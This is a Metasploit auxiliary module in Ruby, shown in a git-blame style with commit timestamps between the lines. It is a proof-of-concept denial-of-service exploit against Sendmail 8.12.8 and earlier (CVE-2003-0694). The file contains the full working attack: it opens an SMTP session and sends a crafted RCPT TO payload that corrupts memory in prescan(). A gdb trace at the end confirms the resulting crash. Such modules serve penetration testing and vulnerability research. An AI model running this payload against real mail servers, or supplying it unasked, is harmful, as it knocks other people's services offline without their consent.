2009-09-12 10:56:36 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-09-12 10:56:36 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Smtp
|
|
|
|
include Msf::Auxiliary::Dos
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-03-11 16:10:39 +00:00
|
|
|
'Name' => 'Sendmail SMTP Address prescan Memory Corruption',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This is a proof of concept denial of service module for Sendmail versions
|
|
|
|
8.12.8 and earlier. The vulnerability is within the prescan() method when
|
|
|
|
parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00
|
|
|
|
bytes can be used, limiting the likelihood for arbitrary code execution.
|
|
|
|
},
|
|
|
|
'Author' => [ 'patrick' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '2577' ],
|
|
|
|
[ 'CVE', '2003-0694' ],
|
|
|
|
[ 'BID', '8641' ],
|
|
|
|
[ 'EDB', '24' ]
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Sep 17 2003'))
|
|
|
|
end
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
begin
|
|
|
|
connect
|
|
|
|
# we use connect instead of connect_login,
|
|
|
|
# because we send our own malicious RCPT.
|
|
|
|
# however we want to make use of MAILFROM
|
|
|
|
# and raw_send_recv()
|
|
|
|
#select(nil,nil,nil,23) # so we can attach gdb to the child PID
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
raw_send_recv("EHLO X\r\n")
|
|
|
|
raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
|
|
|
|
print_status("Sending DoS packet.")
|
|
|
|
raw_send_recv("RCPT TO: #{sploit}\r\n")
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
disconnect
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_status("Couldn't connect to #{rhost}:#{rport}")
|
|
|
|
rescue ::EOFError
|
|
|
|
print_status("Sendmail stopped responding after sending trigger - target vulnerable.")
|
|
|
|
end
|
2009-09-12 10:56:36 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-09-12 10:56:36 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
=begin
|
|
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
|
|
0x8073499 in ?? ()
|
|
|
|
(gdb) bt
|
|
|
|
#0 0x807e499 in ?? ()
|
|
|
|
#1 0x087e125 in ?? ()
|
|
|
|
#2 0x5c5c5c5c in ?? ()
|
|
|
|
Error accessing memory address 0x5c5c5c5c: Bad address.
|
|
|
|
=end
|